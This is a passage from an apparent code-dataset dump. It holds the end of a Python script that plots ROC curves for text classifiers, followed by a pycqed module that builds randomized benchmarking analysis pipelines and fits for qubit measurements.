= %0.2f' % roc_auc_LDA,linewidth=3)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--',color='black')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.ylabel('True Positive Rate')\r\nplt.xlabel('False Positive Rate')\r\nplt.tight_layout()\r\n\r\nplt.subplot(2, 2, 4)\r\nplt.title('Doc2Vec - LR')\r\nplt.plot(fpr_D2V, tpr_D2V, color='darkturquoise', label = 'AUC = %0.2f' % roc_auc_D2V,linewidth=3)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--',color='black')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.ylabel('True Positive Rate')\r\nplt.xlabel('False Positive Rate')\r\nplt.tight_layout()\r\n\r\n\r\nplt.show()\r\nfig.savefig('roc_1',dpi=300)\r\n\r\n\r\n\r\n\r\n####stats test\r\n\r\nfrom scipy.stats import spearmanr\r\nx = list(range(1,7))\r\nspearmanr(x, slp)\r\nspearmanr(x, mlp)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"models_ml_ngrams.py","file_name":"models_ml_ngrams.py","file_ext":"py","file_size_in_byte":18814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"344969296","text":"import logging\nlog = logging.getLogger(__name__)\n\nimport lmfit\nimport numpy as np\nfrom scipy import optimize\nfrom collections import OrderedDict\nfrom pycqed.analysis import fitting_models 
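# A minimal sketch, not part of the original models_ml_ngrams.py: the LDA
# block above calls fit_transform separately on the train and the test
# matrices, fitting two unrelated topic models whose components are not
# aligned -- the classifier is then evaluated in a different feature space
# than it was trained in. The standard pattern fits once on the training
# data and only transforms the test data:
from sklearn.decomposition import LatentDirichletAllocation
from sklearn.feature_extraction.text import CountVectorizer

docs_train = ["the cat sat", "the dog ran", "cats and dogs run"]
docs_test = ["a cat ran"]
cv_demo = CountVectorizer()
train_counts = cv_demo.fit_transform(docs_train)
test_counts = cv_demo.transform(docs_test)

lda = LatentDirichletAllocation(n_components=2, random_state=0)
lda_train = lda.fit_transform(train_counts)   # fit once, on train only
lda_test = lda.transform(test_counts)         # same topic space for test
print(lda_train.shape, lda_test.shape)        # (3, 2) (1, 2)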
as fit_mods\nfrom pycqed.analysis_v3 import fitting as fit_mod\nfrom pycqed.analysis_v3 import plotting as plot_mod\nfrom pycqed.analysis_v3 import helper_functions as hlp_mod\nfrom pycqed.analysis_v3 import processing_pipeline as pp_mod\nfrom pycqed.measurement import sweep_points as sp_mod\nfrom pycqed.measurement.calibration import calibration_points as cp_mod\nfrom copy import deepcopy\n\nimport sys\npp_mod.search_modules.add(sys.modules[__name__])\n\n# Create pipelines\n\n\ndef pipeline_single_qubit_rb_ssro(meas_obj_names, mospm, sweep_points,\n n_shots, dim_hilbert, cal_points=None,\n ro_thresholds=None, nreps=1,\n plot_all_shots=False, sweep_type=None,\n processing_pipeline=None):\n\n \"\"\"\n Wrapper to create the standard processing pipeline for an single qubit RB\n measurement, measured in SSRO.\n WARNING: if you use plot_all_shots=True, disable data saving. It will try\n to save a huge string of the large numpy array this node will generate.\n :param meas_obj_names: list of measured object names\n :param mospm: meas_obj_sweep_points_map\n :param sweep_points: SweepPoints object (of one file if the measurement\n was split into several files)\n :param n_shots: number of shots\n :param dim_hilbert: dimension of Hilebert space. 4 for 2QB RB, 2 for 1QB RB\n :param cal_points: CalibrationPoints object\n :param ro_thresholds: optional (the threshold_data node can also extract\n them from the data_dict. See docstring there).\n Dict with meas_obj_names as keys and their readout thresholds as values.\n :param nreps: int specifying the number of files to combine into one\n measurement. IMPORTANT! This feature only works if the measurement was\n split by seeds, not by cliffords. Meaning that each measurement file\n contains data for all the Cliffords in sweep_points, but for a subset\n of the total seeds.\n :param plot_all_shots: bool specifying whether to produce a raw plot of\n of all the shots vs cliffords. 
SEE WARNING ABOVE.\n :param sweep_type: dict of the form\n {'cliffords': sweep_dim, 'seeds': sweep_dim} where sweep_dim is either\n 0 or 1 and specifies whether the measurement was run with seeds in the\n fast dimension (0) and cliffords in the slow dimensino (1), or the other\n way around.\n :param processing_pipeline: ProcessingPipeline instance to which this\n function will append.\n :return: the unresolved ProcessingPipeline\n \"\"\"\n if sweep_type is None:\n sweep_type = {'cliffords': 0, 'seeds': 1}\n slow_cliffords = sweep_type['cliffords'] == 1\n\n sweep_points = sp_mod.SweepPoints(sweep_points)\n if cal_points is None:\n num_cal_states = 0\n else:\n if isinstance(cal_points, str):\n cal_points = cp_mod.CalibrationPoints.from_string(cal_points)\n num_cal_states = len(cal_points.states)\n if slow_cliffords:\n # n_segments = nr_seeds + nr_cal_segments\n n_segments = nreps*(sweep_points.length(sweep_type['seeds']) +\n num_cal_states)\n # n_sequences = nr_cliffords\n n_sequences = sweep_points.length(sweep_type['cliffords'])\n else:\n # n_segments = nr_cliffords + nr_cal_segments\n n_segments = nreps*(sweep_points.length(sweep_type['cliffords']) +\n num_cal_states)\n # n_sequences = nr_seeds\n n_sequences = sweep_points.length(sweep_type['seeds'])\n\n if processing_pipeline is None:\n processing_pipeline = pp_mod.ProcessingPipeline()\n if nreps > 1:\n processing_pipeline.add_node('combine_datafiles_split_by_seeds',\n keys_in='raw',\n n_shots=n_shots,\n meas_obj_names=meas_obj_names)\n keys_in = 'previous combine_datafiles_split_by_seeds' if nreps > 1 else 'raw'\n processing_pipeline.add_node('threshold_data',\n keys_in=keys_in,\n ro_thresholds=ro_thresholds,\n meas_obj_names=meas_obj_names)\n processing_pipeline.add_node('average_data',\n # shape=(n_shots, n_segments*n_sequences),\n # averaging_axis=0,\n shape=(n_sequences, n_shots, n_segments),\n averaging_axis=1,\n keys_in='previous threshold_data',\n meas_obj_names=meas_obj_names)\n for label in ['rb']:\n pp = pp_mod.ProcessingPipeline(keys_out_container=label)\n pp.add_node('average_data',\n shape=(n_sequences, n_segments),\n averaging_axis=-1 if slow_cliffords else 0,\n keys_in='previous average_data',\n meas_obj_names=meas_obj_names)\n pp.add_node('get_std_deviation',\n shape=(n_sequences, n_segments) ,\n averaging_axis=-1 if slow_cliffords else 0,\n keys_in='previous average_data',\n meas_obj_names=meas_obj_names)\n pp.add_node('rb_analysis',\n d=dim_hilbert,\n sweep_type=sweep_type,\n keys_in=f'previous {label}.average_data',\n keys_in_std=f'previous {label}.get_std_deviation',\n keys_in_all_seeds_data='previous average_data',\n do_plotting=False,\n keys_out=None,\n meas_obj_names=meas_obj_names)\n for mobjn in meas_obj_names:\n cliffords = sweep_points.get_sweep_params_property(\n 'values', sweep_type['cliffords'], mospm[mobjn][\n sweep_type['cliffords']])\n if plot_all_shots:\n pp.add_node('prepare_1d_raw_data_plot_dicts',\n sp_name=mospm[mobjn][sweep_type['cliffords']],\n xvals=np.repeat(cliffords, n_segments*n_shots\n if slow_cliffords else n_sequences*n_shots),\n do_plotting=False,\n figname_suffix=f'shots_{label}',\n title_suffix=' - All shots',\n plot_params={'linestyle': 'none'},\n keys_in=keys_in,\n keys_out=None,\n meas_obj_names=mobjn)\n if slow_cliffords:\n xvals = np.repeat(cliffords, n_segments)\n else:\n xvals = np.tile(cliffords, n_sequences)\n pp.add_node('prepare_1d_raw_data_plot_dicts',\n sp_name=mospm[mobjn][sweep_type['cliffords']],\n xvals=xvals,\n do_plotting=False,\n figname_suffix=f'{label}',\n 
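# A minimal sketch, not part of the original rb analysis module: the
# average_data node above takes shape=(n_sequences, n_shots, n_segments) and
# averaging_axis=1, i.e. it folds the flat shot record into a 3-D block and
# averages over the shot axis. A toy numpy equivalent:
import numpy as np

n_sequences, n_shots, n_segments = 3, 4, 5
flat_shots = np.random.randint(0, 2, n_sequences * n_shots * n_segments)

block = flat_shots.reshape(n_sequences, n_shots, n_segments)
probs = block.mean(axis=1)        # shot-averaged excited-state probability
print(probs.shape)                # (3, 5): one value per sequence, segment

# The xvals above likewise use np.repeat when cliffords are in the slow
# dimension (each clifford held for a whole block of segments) and np.tile
# when they are in the fast dimension (the clifford axis cycled per sequence):
cliffords = np.array([0, 10, 20])
print(np.repeat(cliffords, 2))    # [ 0  0 10 10 20 20]
print(np.tile(cliffords, 2))      # [ 0 10 20  0 10 20]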
title_suffix=' - All seeds',\n plot_params={'linestyle': 'none'},\n ylabel='Probability, $P(|e\\\\rangle)$',\n yunit='',\n keys_in='previous average_data',\n keys_out=None,\n meas_obj_names=mobjn)\n processing_pipeline += pp\n\n # do plotting of all plot_dicts in the data_dict\n processing_pipeline.add_node('plot')\n\n return processing_pipeline\n\n\ndef pipeline_interleaved_rb_irb_classif(meas_obj_names, mospm, sweep_points,\n dim_hilbert, cal_points=None, nreps=1,\n sweep_type=None,\n processing_pipeline=None):\n \"\"\"\n Wrapper to create the standard processing pipeline for an interleaved RB/RIB\n measurement, measured with a the classifier detector with qutrit readout\n :param meas_obj_names: list of measured object names\n :param mospm: meas_obj_sweep_points_map\n :param sweep_points: SweepPoints object (of one file if the measurement\n was split into several files)\n :param dim_hilbert: dimension of Hilebert space. 4 for 2QB RB, 2 for 1QB RB\n :param cal_points: CalibrationPoints object\n :param nreps: int specifying the number of files to combine into one\n measurement. IMPORTANT! This feature only works if the measurement was\n split by seeds, not by cliffords. Meaning that each measurement file\n contains data for all the Cliffords in sweep_points, but for a subset\n of the total seeds.\n :param sweep_type: dict of the form\n {'cliffords': sweep_dim, 'seeds': sweep_dim} where sweep_dim is either\n 0 or 1 and specifies whether the measurement was run with seeds in the\n fast dimension (0) and cliffords in the slow dimensino (1), or the other\n way around.\n :param processing_pipeline: ProcessingPipeline instance to which this\n function will append.\n :return: the unresolved ProcessingPipeline\n \"\"\"\n if sweep_type is None:\n sweep_type = {'cliffords': 0, 'seeds': 1}\n slow_cliffords = sweep_type['cliffords'] == 1\n\n sweep_points = sp_mod.SweepPoints(sweep_points)\n if cal_points is None:\n num_cal_states = 0\n else:\n if isinstance(cal_points, str):\n cal_points = cp_mod.CalibrationPoints.from_string(cal_points)\n num_cal_states = len(cal_points.states)\n\n if slow_cliffords:\n # n_segments = nr_seeds + nr_cal_segments\n n_segments = nreps*(sweep_points.length(sweep_type['seeds'])\n + num_cal_states)\n # n_sequences = nr_cliffords\n n_sequences = sweep_points.length(sweep_type['cliffords'])\n else:\n # n_segments = nr_cliffords + nr_cal_segments\n n_segments = nreps*(sweep_points.length(sweep_type['cliffords'])\n + num_cal_states)\n # n_sequences = nr_seeds\n n_sequences = sweep_points.length(sweep_type['seeds'])\n\n if processing_pipeline is None:\n processing_pipeline = pp_mod.ProcessingPipeline()\n if nreps > 1:\n processing_pipeline.add_node('combine_datafiles_split_by_seeds',\n keys_in='raw',\n interleaved_irb=True,\n sweep_type=sweep_type,\n meas_obj_names=meas_obj_names)\n for label in ['rb', 'irb']:\n pp = pp_mod.ProcessingPipeline(global_keys_out_container=label)\n keys_in = 'previous combine_datafiles_split_by_seeds' if \\\n nreps > 1 else 'raw'\n pp.add_node('submsmt_data_from_interleaved_msmt', msmt_name=label,\n keys_in=keys_in, meas_obj_names=meas_obj_names)\n pp.add_node('average_data',\n shape=(n_sequences, n_segments),\n averaging_axis=-1 if slow_cliffords else 0,\n keys_in=f'previous {label}.submsmt_'\n f'data_from_interleaved_msmt',\n meas_obj_names=meas_obj_names)\n pp.add_node('get_std_deviation',\n shape=(n_sequences, n_segments),\n averaging_axis=-1 if slow_cliffords else 0,\n keys_in=f'previous {label}.submsmt_'\n f'data_from_interleaved_msmt',\n 
meas_obj_names=meas_obj_names)\n pp.add_node('rb_analysis',\n d=dim_hilbert,\n keys_in=f'previous {label}.average_data',\n keys_in_std=f'previous {label}.get_std_deviation',\n keys_in_all_seeds_data=f'previous {label}.submsmt_'\n f'data_from_interleaved_msmt',\n do_plotting=False,\n keys_out=None,\n meas_obj_names=meas_obj_names)\n for mobjn in meas_obj_names:\n cliffords = sweep_points.get_sweep_params_property(\n 'values', sweep_type['cliffords'], mospm[mobjn][\n sweep_type['cliffords']])\n pp.add_node('prepare_1d_raw_data_plot_dicts',\n sp_name=mospm[mobjn][-1],\n xvals=np.repeat(cliffords, n_segments),\n do_plotting=False,\n figname_suffix=f'{label}',\n title_suffix=' - All seeds',\n plot_params={'linestyle': 'none'},\n ylabel='Probability, $P(|ee\\\\rangle)$' if\n mobjn=='correlation_object' else None,\n yunit='',\n keys_in=f'previous {label}.submsmt_'\n f'data_from_interleaved_msmt',\n keys_out=None,\n meas_obj_names=mobjn)\n processing_pipeline += pp\n\n # calculate interleaved gate error\n processing_pipeline.add_node('irb_gate_error',\n meas_obj_names='correlation_object',\n d=dim_hilbert)\n\n # do plotting of all plot_dicts in the data_dict\n processing_pipeline.add_node('plot')\n\n return processing_pipeline\n\n\ndef pipeline_ssro_measurement(meas_obj_names, mospm, sweep_points, n_shots,\n dim_hilbert, ro_thresholds=None,\n nreps=1, interleaved_irb=False, sweep_type=None,\n plot_all_shots=False, processing_pipeline=None,\n compression_factor=1, **params):\n\n \"\"\"\n Wrapper to create the standard processing pipeline for an interleaved RB/IRB\n measurement, measured in SSRO.\n WARNING: if you use plot_all_shots=True, disable data saving. It will try\n to save a huge string of the large numpy array this node will generate.\n :param meas_obj_names: list of measured object names\n :param mospm: meas_obj_sweep_points_map\n :param sweep_points: SweepPoints object (of one file if the measurement\n was split into several files)\n :param n_shots: number of shots\n :param dim_hilbert: dimension of Hilbert space. 4 for 2QB RB, 2 for 1QB RB\n :param ro_thresholds: optional (the threshold_data node can also extract\n them from the data_dict. See docstring there).\n Dict with meas_obj_names as keys and their readout thresholds as values.\n :param nreps: int specifying the number of files to combine into one\n measurement. IMPORTANT! This feature only works if the measurement was\n split by seeds, not by cliffords. Meaning that each measurement file\n contains data for all the Cliffords in sweep_points, but for a subset\n of the total seeds.\n :param interleaved_irb: bool specifying whether the measurement was\n IRB with RB and IRB interleaved.\n :param plot_all_shots: bool specifying whether to produce a raw plot\n of all the shots vs cliffords. SEE WARNING ABOVE.\n :param sweep_type: dict of the form\n {'cliffords': sweep_dim, 'seeds': sweep_dim} where sweep_dim is either\n 0 or 1 and specifies whether the measurement was run with seeds in the\n fast dimension (0) and cliffords in the slow dimension (1), or the other\n way around.\n :param compression_factor: sequence compression factor\n :param processing_pipeline: ProcessingPipeline instance to which this\n function will append.\n :return: the unresolved ProcessingPipeline\n \"\"\"\n if sweep_type is None:\n sweep_type = {'cliffords': 0, 'seeds': 1}\n slow_cliffords = sweep_type['cliffords'] == 1\n\n nr_swpts0 = sweep_points.length(0)\n nr_swpts1 = sweep_points.length(1)\n n_segments = nr_swpts0 * compression_factor\n n_sequences = (nr_swpts1 * (interleaved_irb + 1)) // compression_factor\n\n if processing_pipeline is None:\n processing_pipeline = pp_mod.ProcessingPipeline()\n if nreps > 1:\n processing_pipeline.add_node('combine_datafiles_split_by_seeds',\n keys_in='raw',\n n_shots=n_shots,\n sweep_type=sweep_type,\n interleaved_irb=interleaved_irb,\n meas_obj_names=meas_obj_names)\n keys_in = 'previous combine_datafiles_split_by_seeds' if nreps > 1 else 'raw'\n processing_pipeline.add_node('threshold_data',\n keys_in=keys_in,\n ro_thresholds=ro_thresholds,\n meas_obj_names=meas_obj_names)\n processing_pipeline.add_node('average_data',\n shape=(n_sequences, n_shots, n_segments),\n final_shape=(n_sequences*n_segments),\n averaging_axis=1,\n keys_in='previous threshold_data',\n meas_obj_names=meas_obj_names)\n if plot_all_shots:\n for mobjn in meas_obj_names:\n cliffords = sweep_points.get_sweep_params_property(\n 'values', sweep_type['cliffords'], mospm[mobjn])[0]\n keys_in = 'previous combine_datafiles_split_by_seeds' \\\n if nreps > 1 else 'raw'\n if slow_cliffords:\n xvals = np.repeat(cliffords, 2*n_segments*n_shots if\n interleaved_irb else n_segments*n_shots)\n else:\n xvals = np.repeat(cliffords, n_sequences*n_shots)\n processing_pipeline.add_node('prepare_1d_raw_data_plot_dicts',\n sp_name=mospm[mobjn][-1],\n xvals=xvals,\n do_plotting=False,\n figname_suffix=f'shots',\n title_suffix=' - All shots',\n plot_params={'linestyle': 'none'},\n keys_in=keys_in,\n keys_out=None,\n meas_obj_names=mobjn)\n\n if dim_hilbert == 4:\n processing_pipeline.add_node('correlate_qubits',\n keys_in='previous threshold_data',\n meas_obj_names=meas_obj_names,\n joint_processing=True, num_keys_out=1,\n keys_out_container='correlation_object',\n add_mobjn_container=False)\n processing_pipeline.add_node('average_data',\n shape=(n_sequences, n_shots, n_segments),\n final_shape=(n_sequences*n_segments),\n averaging_axis=1,\n keys_in='previous correlate_qubits',\n meas_obj_names=['correlation_object'])\n\n meas_obj_names = deepcopy(meas_obj_names)\n meas_obj_names += ['correlation_object']\n mospm['correlation_object'] = list(mospm.values())[0]\n labels = ['rb', 'irb'] if interleaved_irb else ['rb']\n for label in labels:\n pp = pp_mod.ProcessingPipeline(keys_out_container=label)\n keys_in_0 = 'previous average_data'\n if interleaved_irb:\n pp.add_node('submsmt_data_from_interleaved_msmt',\n msmt_name=label,\n keys_in='previous average_data',\n meas_obj_names=meas_obj_names)\n keys_in_0 = f'previous {label}.submsmt_data_from_interleaved_msmt'\n pp.add_node('average_data',\n shape=(nr_swpts1, nr_swpts0),\n averaging_axis=-1 if slow_cliffords else 0,\n keys_in=keys_in_0,\n meas_obj_names=meas_obj_names)\n pp.add_node('get_std_deviation',\n shape=(nr_swpts1, nr_swpts0),\n averaging_axis=-1 if 
slow_cliffords else 0,\n keys_in=keys_in_0,\n meas_obj_names=meas_obj_names)\n pp.add_node('rb_analysis',\n d=dim_hilbert,\n sweep_type=sweep_type,\n msmt_type=label,\n state_prob_name='e' if dim_hilbert==2 else None,\n keys_in=f'previous {label}.average_data',\n keys_in_std=f'previous {label}.get_std_deviation',\n keys_in_all_seeds_data=keys_in_0,\n do_plotting=False,\n keys_out=None,\n meas_obj_names=meas_obj_names)\n for mobjn in meas_obj_names:\n cliffords = sweep_points.get_sweep_params_property(\n 'values', sweep_type['cliffords'], mospm[mobjn])[0]\n xvals = np.repeat(cliffords, nr_swpts0) if slow_cliffords else \\\n np.tile(cliffords, nr_swpts1)\n pp.add_node('prepare_1d_raw_data_plot_dicts',\n sp_name=mospm[mobjn][-1],\n xvals=xvals,\n do_plotting=False,\n figname_suffix=f'{label}',\n title_suffix=' - All seeds',\n plot_params={'linestyle': 'none'},\n ylabel='Probability, ' + ('$P(|ee\\\\rangle)$' if\n mobjn=='correlation_object' else '$P(|e\\\\rangle)$'),\n yunit='',\n keys_in=keys_in_0,\n keys_out=None,\n meas_obj_names=mobjn)\n processing_pipeline += pp\n\n if interleaved_irb:\n # calculate interleaved gate error\n processing_pipeline.add_node(\n 'irb_gate_error', meas_obj_names='correlation_object' if\n dim_hilbert == 4 else meas_obj_names, d=dim_hilbert)\n\n # do plotting of all plot_dicts in the data_dict\n if params.get('do_plotting', True):\n processing_pipeline.add_node('plot')\n\n return processing_pipeline\n\n\n# nodes related to extracting data\ndef combine_datafiles_split_by_seeds(data_dict, keys_in, keys_out,\n interleaved_irb=False, **params):\n \"\"\"\n NOT FULLY IMPLEMENTED FOR slow_cliffords == True!!!\n Combines the data from an (interleaved) RB/IRB measurement that was saved in\n multiple files into one data set that would look as if it had all been\n taken in one measurement (one file).\n :param data_dict: OrderedDict containing data to be processed and where\n processed data is to be stored\n :param keys_in: list of key names or dictionary keys paths in\n data_dict for the data to be processed\n :param keys_out: list of key names or dictionary keys paths in\n data_dict for the processed data to be saved into\n :param interleaved_irb: bool specifying whether the measurement was\n IRB with RB and IRB interleaved.\n :param params: keyword arguments:\n Should contain 'exp_metadata_list', 'n_shots', 'mospm', 'rev_movnm',\n 'cp' if they are not in data_dict\n ToDo: put n_shots info in the metadata (27.07.2020)\n :return:\n\n Assumptions:\n - ASSUMES MEASUREMENT WAS SPLIT BY SEEDS NOT BY CLIFFORDS. 
Meaning that\n each measurement file contains data for all the Cliffords in\n sweep_points, but for a subset of the total seeds.\n\n \"\"\"\n assert len(keys_in) == len(keys_out)\n\n n_shots = hlp_mod.get_param('n_shots', data_dict, default_value=1, **params)\n mospm, rev_movnm, cp, mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mospm', 'rev_movnm', 'cp', 'mobjn'],\n **params)\n metadata_list = hlp_mod.get_param('exp_metadata_list', data_dict,\n raise_error=True, **params)\n sp_list = [hlp_mod.get_param('sweep_points', mdl, raise_error=True)\n for mdl in metadata_list]\n sp0 = sp_mod.SweepPoints(sp_list[0])\n\n nr_segments = sp0.length(0) + len(cp.states)\n nr_uploads = sp0.length(1)\n chunk = nr_segments*n_shots\n\n data_to_proc_dict = hlp_mod.get_data_to_process(data_dict, keys_in)\n for keyi, keyo in zip(keys_in, keys_out):\n data = data_to_proc_dict[keyi]\n if np.ndim(data) != 2:\n raise ValueError(f'Data corresponding to {keyi} is not 2D.')\n # take the segment_chunk * n_shots for each clifford from each row\n # (corresponding to data from one data file) in data and concatenate\n # them. Put all the nr_cliffords concatenations in the\n # list data_combined\n data_combined = [np.concatenate(\n [d[m * chunk + j * nr_segments: m * chunk + (j + 1) * nr_segments]\n for d in data])\n for m in np.arange((interleaved_irb + 1)*nr_uploads)\n for j in np.arange(n_shots)]\n # concatenate all the lists in data_combined to get one complete\n # array of data\n data_combined = np.concatenate(data_combined)\n hlp_mod.add_param(keyo, data_combined, data_dict, **params)\n\n # update the sweep_points if they were a list\n nr_sp0 = sp0.length(0)\n nr_exp = len(sp_list)\n sp_all_vals_list = [np.zeros(nr_exp*nr_sp0, dtype=int) for _\n in range(len(sp0.get_sweep_dimension(0)))]\n\n for i, sp in enumerate(sp_list):\n sp = sp_mod.SweepPoints(sp)\n sp_vals_list = sp.get_sweep_params_property('values', 0, 'all')\n for j, sp_vals in enumerate(sp_vals_list):\n sp_all_vals_list[j][i::nr_exp] = sp_vals\n\n sweep_points = sp_mod.SweepPoints()\n for i, sp_name in enumerate(sp0.get_sweep_dimension(0)):\n sweep_points.add_sweep_parameter(\n sp_name, sp_all_vals_list[i],\n sp0.get_sweep_params_property('unit', 0, sp_name),\n sp0.get_sweep_params_property('label', 0, sp_name))\n sweep_points += [sp0.get_sweep_dimension(1)]\n hlp_mod.add_param('exp_metadata.sweep_points', sweep_points,\n data_dict, add_param_method='replace')\n\n\ndef submsmt_data_from_interleaved_msmt(data_dict, keys_in, msmt_name,\n keys_out=None, sweep_type=None,\n **params):\n start_index = (msmt_name.lower() != 'rb')\n if sweep_type is None:\n sweep_type = {'cliffords': 0, 'seeds': 1}\n slow_cliffords = sweep_type['cliffords'] == 1\n\n n_shots = hlp_mod.get_param('n_shots', data_dict, default_value=1, **params)\n data_to_proc_dict = hlp_mod.get_data_to_process(data_dict, keys_in)\n sp, cp = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['sp', 'cp'], **params)\n nr_seeds = sp.length(sweep_type['seeds']) + len(cp.states)\n nr_cliffords = sp.length(sweep_type['cliffords'])\n nr_segments = (nr_seeds if slow_cliffords else nr_cliffords) + len(cp.states)\n nr_uploads = (nr_cliffords if slow_cliffords else nr_seeds)\n\n if keys_out is None:\n keys_out = [f'{msmt_name}_data_from_interleaved_msmt.{s}'\n for s in keys_in]\n for keyi, keyo in zip(keys_in, keys_out):\n data = data_to_proc_dict[keyi]\n if len(data) != nr_segments * (2 * nr_uploads):\n raise ValueError(f'The data has the wrong size of {len(data)}, 
'\n f'which is not expected for {nr_segments} '\n f'segments and {nr_uploads} uploads.')\n selected_data = np.concatenate([\n data[j*nr_segments*n_shots:(j+1)*nr_segments*n_shots]\n for j in np.arange(2*nr_uploads)[start_index::2]])\n hlp_mod.add_param(\n keyo, selected_data, data_dict, **params)\n\n\ndef rb_analysis(data_dict, keys_in, sweep_type=None, **params):\n \"\"\"\n Does single qubit RB analysis. Prepares fits and plots, and extracts\n errors per clifford.\n :param data_dict: OrderedDict containing data to be processed and where\n processed data is to be stored\n :param keys_in: list of key names or dictionary keys paths in\n data_dict for the data to be processed\n\n Assumptions:\n - cal_points, sweep_points, qb_sweep_points_map, qb_name exist in\n metadata or params\n - expects a 2d sweep with nr_seeds on innermost sweep and cliffords\n on outermost\n - if active reset was used, 'filter' must be in the key names of the\n filtered data if you want the filtered raw data to be plotted\n \"\"\"\n data_to_proc_dict = hlp_mod.get_data_to_process(data_dict, keys_in)\n keys_in = list(data_to_proc_dict)\n\n prep_fit_dicts = hlp_mod.pop_param('prep_fit_dicts', data_dict,\n default_value=True, node_params=params)\n do_fitting = hlp_mod.pop_param('do_fitting', data_dict,\n default_value=True, node_params=params)\n prepare_plotting = hlp_mod.pop_param('prepare_plotting', data_dict,\n default_value=True, node_params=params)\n do_plotting = hlp_mod.pop_param('do_plotting', data_dict,\n default_value=True, node_params=params)\n\n sp, mospm, mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['sp', 'mospm', 'mobjn'], **params)\n if sweep_type is None:\n sweep_type = {'cliffords': 0, 'seeds': 1}\n nr_seeds = sp.length(sweep_type['seeds'])\n if len(data_dict['timestamps']) > 1:\n nr_seeds *= len(data_dict['timestamps'])\n cliffords = sp.get_sweep_params_property('values', sweep_type['cliffords'],\n mospm[mobjn])[0]\n\n # prepare fitting\n if prep_fit_dicts:\n prepare_rb_fitting(data_dict, data_to_proc_dict, cliffords, nr_seeds,\n **params)\n\n if do_fitting:\n getattr(fit_mod, 'run_fitting')(data_dict, keys_in=list(\n data_dict['fit_dicts']),**params)\n # extract EPC, leakage, and seepage from fits and save to\n # data_dict[meas_obj_name]\n analyze_rb_fit_results(data_dict, keys_in, **params)\n\n # prepare plots\n if prepare_plotting:\n prepare_rb_plots(data_dict, keys_in, sweep_type, **params)\n if do_plotting:\n getattr(plot_mod, 'plot')(data_dict, keys_in=list(\n data_dict['plot_dicts']), **params)\n\n\ndef prepare_rb_fitting(data_dict, data_to_proc_dict, cliffords, nr_seeds,\n **params):\n cp, mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['cp', 'mobjn'], **params)\n conf_level = hlp_mod.get_param('conf_level', data_dict,\n default_value=0.68, **params)\n do_simple_fit = hlp_mod.get_param(\n 'do_simple_fit', data_dict, default_value=True, **params)\n d = hlp_mod.get_param('d', data_dict, raise_error=True, **params)\n print('d: ', d)\n guess_pars = {'A': {'value': 1},\n 'p': {'value': 0.99},\n 'B': {'value': 0}}\n fit_guess_params = hlp_mod.get_param('fit_guess_params', data_dict,\n default_value={}, **params)\n guess_pars.update(fit_guess_params)\n\n fit_dicts = OrderedDict()\n rb_mod = lmfit.Model(fit_mods.RandomizedBenchmarkingDecay)\n rb_mod.set_param_hint('Amplitude', **guess_pars['A'])\n rb_mod.set_param_hint('p', **guess_pars['p'])\n rb_mod.set_param_hint('offset', **guess_pars['B'])\n rb_mod.set_param_hint('fidelity_per_Clifford',\n 
expr=f'1-(({d}-1)*(1-p)/{d})')\n rb_mod.set_param_hint('error_per_Clifford',\n expr='1-fidelity_per_Clifford')\n gate_decomp = hlp_mod.get_param('gate_decomp', data_dict,\n default_value='HZ', **params)\n if gate_decomp == 'XY':\n rb_mod.set_param_hint('fidelity_per_gate',\n expr='fidelity_per_Clifford**(1./1.875)')\n elif gate_decomp == 'HZ':\n rb_mod.set_param_hint('fidelity_per_gate',\n expr='fidelity_per_Clifford**(1./1.125)')\n else:\n raise ValueError('Gate decomposition not recognized.')\n rb_mod.set_param_hint('error_per_gate', expr='1-fidelity_per_gate')\n guess_pars = rb_mod.make_params()\n\n keys_in_std = hlp_mod.get_param('keys_in_std', data_dict, raise_error=False,\n **params)\n if keys_in_std is None:\n keys_in_std = [''] * len(data_to_proc_dict)\n if len(keys_in_std) != len(data_to_proc_dict):\n raise ValueError('keys_in_std and keys_in do not have '\n 'the same length.')\n for keyi, keys in zip(data_to_proc_dict, keys_in_std):\n if 'pf' in keyi:\n # if this is the |f> state population data, then do an additional\n # fit based on the Google style\n fit_mod.prepare_rbleakage_fit_dict(\n data_dict, [keyi], indep_var_array=cliffords,\n fit_name='rbleak_fit', **params)\n\n # do standard fit to A*p**m + B\n key = 'rb_fit' + keyi\n data_fit = hlp_mod.get_msmt_data(data_to_proc_dict[keyi], cp, mobjn)\n\n model = deepcopy(rb_mod)\n fit_dicts[key] = {\n 'fit_fn': fit_mods.RandomizedBenchmarkingDecay,\n 'fit_xvals': {'numCliff': cliffords},\n 'fit_yvals': {'data': np.array(data_fit).flatten()},\n 'guess_pars': guess_pars}\n\n if do_simple_fit:\n fit_kwargs = {}\n elif keys is not None:\n stds = np.array(hlp_mod.get_param(keys, data_dict)).flatten()\n fit_kwargs = {'scale_covar': False,\n 'weights': 1/stds}\n else:\n # Run once to get an estimate for the error per Clifford\n fit_res = model.fit(data_fit, numCliff=cliffords,\n params=guess_pars)\n # Use the found error per Clifford to compute standard errors\n # for the data points from Helsen et al. (2017)\n epsilon_guess = hlp_mod.get_param('epsilon_guess', data_dict,\n default_value=0.01, **params)\n epsilon = calculate_rb_confidence_intervals(\n nr_seeds=nr_seeds,\n nr_cliffords=cliffords,\n depolariz_param=fit_res.best_values['p'],\n conf_level=conf_level,\n epsilon_guess=epsilon_guess, d=2)\n\n hlp_mod.add_param(\n keys, epsilon, data_dict,\n add_param_method=params.get('add_param_method', None))\n # Run fit again with scale_covar=False and weights=1/epsilon.\n # If an entry in epsilon is 0, replace it with half the\n # minimum nonzero value in the epsilon array\n idxs = np.where(epsilon == 0)[0]\n epsilon[idxs] = min([eps for eps in epsilon if eps != 0])/2\n fit_kwargs = {'scale_covar': False, 'weights': 1/epsilon}\n fit_dicts[key]['fit_kwargs'] = fit_kwargs\n\n hlp_mod.add_param('fit_dicts', fit_dicts, data_dict,\n add_param_method='update')\n\n\ndef analyze_rb_fit_results(data_dict, keys_in, **params):\n mobjn = 